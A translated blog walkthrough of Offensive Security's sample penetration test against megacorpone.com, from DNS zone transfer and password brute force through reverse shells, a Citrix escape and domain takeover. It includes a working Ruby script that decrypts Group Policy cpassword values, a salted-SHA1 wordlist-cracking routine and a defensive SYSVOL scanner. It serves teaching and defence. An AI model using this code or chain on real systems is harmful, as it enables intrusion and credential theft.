Sleepy Dragon · 2013/09/10 20:13

From: penetration-testing-sample-report-2013.pdf

A penetration test report by Offensive Security, translated with highlights 🙂

The process is really nice ~

The target domain for this test is megacorpone.com.

Take a look at its DNS servers:

Then a DNS zone transfer vulnerability was found on NS2.megacorpone.com.

For background on zone transfers, see drops.wooyun.org/papers/64.

From the picture it can be seen that all the hostnames resolve into the 50.7.67.x IP range. The network topology is as follows:

An Apache web server was found on port 81 of admin.megacorpone.com, and its paths were scanned:

It can be seen that /admin is a path that requires authentication.

A wordlist was built from the content of the www.megacorpone.com website and used to brute-force the password, with admin as the username.

The cracked password was: nanotechnology1

The screen after logging in:

It is PhpSQLiteCMS, which manages SQLite data:

The usernames and password hashes can be queried on this page:

The stored hashes were not in the usual format, so a copy of PhpSQLiteCMS was downloaded to see how it hashes:

The hashing method is: a 10-character salt is combined with the password and hashed with SHA1, and the original salt is stored in the database concatenated with the hash as a single string.

Using the same hashing method, the hashes were brute-forced to try to crack the other accounts, and two more were cracked. The benefit of collecting passwords is that other systems may reuse the same username and password, which makes them easy to get into.
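As an added example (not code from the original post or from PhpSQLiteCMS), here is a reconstruction of the hash scheme just described: a 10-character salt combined with the password, hashed with SHA1, and stored as one string with the salt in front. It shows why such a stored value is easy to verify and why, once the format is known, a site-specific wordlist still cracks it quickly even though the salt defeats precomputed tables. Salt-before-password ordering and hex encoding of the digest are assumptions; the post only says the salt is used "together with sha1".

```ruby
# Added example, not code from the original post or from PhpSQLiteCMS.
# Reconstruction of the described scheme: salt(10 chars) + hex(SHA1(salt + password)).
# Salt-before-password ordering and hex encoding are assumptions.
require 'digest'
require 'securerandom'

SALT_LEN = 10

# Hash a password the way the CMS is described to do it and return the stored
# form: the 10-character salt followed by the 40-character hex digest.
def make_hash(password, salt = SecureRandom.alphanumeric(SALT_LEN))
  raise ArgumentError, "salt must be #{SALT_LEN} characters" unless salt.length == SALT_LEN
  salt + Digest::SHA1.hexdigest(salt + password)
end

# Split a stored value back into salt and digest. The storage format is all that
# is needed to do this, so the salt gives no secrecy, only uniqueness.
def split_hash(stored)
  [stored[0, SALT_LEN], stored[SALT_LEN..-1]]
end

# Constant-time comparison so a login check does not leak how many leading
# characters of the digest matched.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Verify a login attempt against a stored value.
def verify(stored, candidate)
  salt, digest = split_hash(stored)
  secure_equal?(digest, Digest::SHA1.hexdigest(salt + candidate))
end

# Offline wordlist check: the first word that reproduces the hash, or nil.
# SHA1 is fast, so a short wordlist built from the site's own content is checked
# in no time; the salt only stops reuse of one precomputed table across users.
# A deliberately slow hash (bcrypt, scrypt, Argon2) is the mitigation.
def wordlist_match(stored, words)
  words.find { |w| verify(stored, w) }
end

if __FILE__ == $0
  stored = make_hash("nanotechnology1")
  puts "stored value: #{stored}"
  puts "login with correct password: #{verify(stored, 'nanotechnology1')}"
  puts "wordlist hit: #{wordlist_match(stored, %w[password admin nanotechnology1]).inspect}"
end
```

Running the block with a random salt prints a different stored value each time, but the verify and wordlist results stay the same, which is exactly the property the post exploits: a different salt per user does not slow down a per-user dictionary run.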

There is a public code injection vulnerability in the SQLite Manager software, which can be exploited directly with the public exploit:

www.exploit-db.com/exploits/24…

A reverse shell comes back:

Server topology:

It was also found that privileges could be escalated on the server, using a privilege escalation exploit:

www.exploit-db.com/exploits/18…

The server is now fully under control.

After a careful analysis of the server, the Java application in the web directory was found to allow access from only one network segment.

It was later discovered that an administrator is on this network segment:

A Java applet was added to the web page in order to directly control the remote client.

(PS: There are so many Java 0days, I don’t know if I can put them on the page directly.)

After the administrator downloads and allows it:

The network topology is as follows:

The administrator's computer was found to be in the domain, and the access was escalated to domain administrator.

A group management file (groups.xml) was found on the system.

(PS: regarding the problem of these group management files existing in 2008 domains, see: www.carnal0wnage.com/papers/LARE.)

Metasploit has a Ruby script to find the XML files and decrypt them: github.com/rapid7/meta…

Check the groups.xml file:

Decryption:

The decryption Ruby script is posted here:

Usage:

# ruby decrypt.rb ciphertext

#!/usr/bin/env ruby
require 'rubygems'
require 'openssl'
require 'base64'

#encrypted_data = "AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk"
encrypted_data = ARGV[0]
abort("usage: ruby decrypt.rb ciphertext") if encrypted_data.nil?

def decrypt(encrypted_data)
  # cpassword is stored as base64 with the '=' padding stripped; restore it
  padding = "=" * (4 - (encrypted_data.length % 4))
  epassword = "#{encrypted_data}#{padding}"
  decoded = Base64.decode64(epassword)

  # Static AES-256 key that Microsoft published for GPP cpassword values
  key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
  aes = OpenSSL::Cipher.new("AES-256-CBC")
  aes.decrypt
  aes.key = key
  # no IV is set, so the all-zero default IV is used
  plaintext = aes.update(decoded)
  plaintext << aes.final
  pass = plaintext.unpack('v*').pack('C*') # UNICODE (UTF-16LE) conversion

  return pass
end

blah = decrypt(encrypted_data)
puts blah
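The decryption script above recovers one value at a time; what a defender wants is the other direction, an inventory of every Group Policy Preferences file that still carries a cpassword attribute, so the entries can be removed. The following is an added example (not from the original post or from Metasploit) that scans a set of GPP XML documents for that attribute. The SYSVOL paths and file contents are constructed sample data (the policy GUID is a placeholder), and the cpassword value is the one quoted in the script above.

```ruby
# Added example, not code from the original post or from Metasploit.
# Defender-side scan: report every GPP element carrying a cpassword attribute.
require 'rexml/document'

# Constructed sample standing in for a walk of \\domain\SYSVOL\...\Preferences.
# Paths use a placeholder policy GUID; contents are made up for this example.
SAMPLE_SYSVOL = {
  "Policies/{POLICY-GUID-PLACEHOLDER}/Machine/Preferences/Groups/Groups.xml" => <<~XML,
    <?xml version="1.0" encoding="utf-8"?>
    <Groups>
      <User name="LocalAdmin">
        <Properties action="U" userName="LocalAdmin"
                    cpassword="AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk"/>
      </User>
    </Groups>
  XML
  "Policies/{POLICY-GUID-PLACEHOLDER}/Machine/Preferences/Services/Services.xml" => <<~XML,
    <?xml version="1.0" encoding="utf-8"?>
    <NTServices>
      <NTService name="Backup">
        <Properties startupType="AUTOMATIC" serviceName="Backup" accountName="svc_backup"/>
      </NTService>
    </NTServices>
  XML
}

# Parse one GPP XML document and return a finding for every element that has a
# cpassword attribute. Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml
# and Drives.xml all use the same attribute name, so one XPath covers them all.
def find_cpasswords(xml)
  doc = REXML::Document.new(xml)
  REXML::XPath.match(doc, "//*[@cpassword]").map do |el|
    attrs = el.attributes
    {
      item: el.parent.name,                                        # e.g. User, NTService, Task
      user: attrs["userName"] || attrs["accountName"] || attrs["runAs"],
      cpassword_length: attrs["cpassword"].length
    }
  end
end

# Scan every (path => content) pair and tag each finding with its file path.
def scan_sysvol(files)
  files.flat_map do |path, content|
    find_cpasswords(content).map { |f| f.merge(path: path) }
  end
end

if __FILE__ == $0
  scan_sysvol(SAMPLE_SYSVOL).each do |f|
    puts "#{f[:path]}: #{f[:item]} '#{f[:user]}' has a cpassword (#{f[:cpassword_length]} chars)"
  end
end
```

The scan reports the Groups.xml entry and stays silent on the Services.xml entry that sets no password. Note that installing MS14-025 only removes the ability to create new cpassword entries; files that already exist in SYSVOL keep their encrypted values until someone deletes them, which is why a periodic scan like this one is still worthwhile.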

An attempt to forward the intranet remote desktop connection with plink port forwarding was blocked:

After some testing, it can be forwarded through HTTP-tunnel:

http-tunnel.sourceforge.net/

The login username and password are mike's, from the SQLite Manager application.

The network topology is as follows:

Opening IE's default home page reveals a Citrix server; log in with the same username and password as the remote desktop connection:

The Citrix environment is sandboxed and only IE can be used, but this can be bypassed.

Using IE's Save dialog, a new PowerShell .bat batch file is created:

PowerShell is used to download Metasploit's reverse shell payload.

After downloading, it is run from the Save dialog with the administrator's permissions.

This gives access to the Citrix system.

The network topology is as follows:

On the Citrix server, usernames and passwords are pulled from memory:

It contains a number of usernames and passwords, including that of a Windows domain administrator.

A remote connection service was created on the Citrix server and logged into as the domain administrator:

The Windows domain is now fully under control.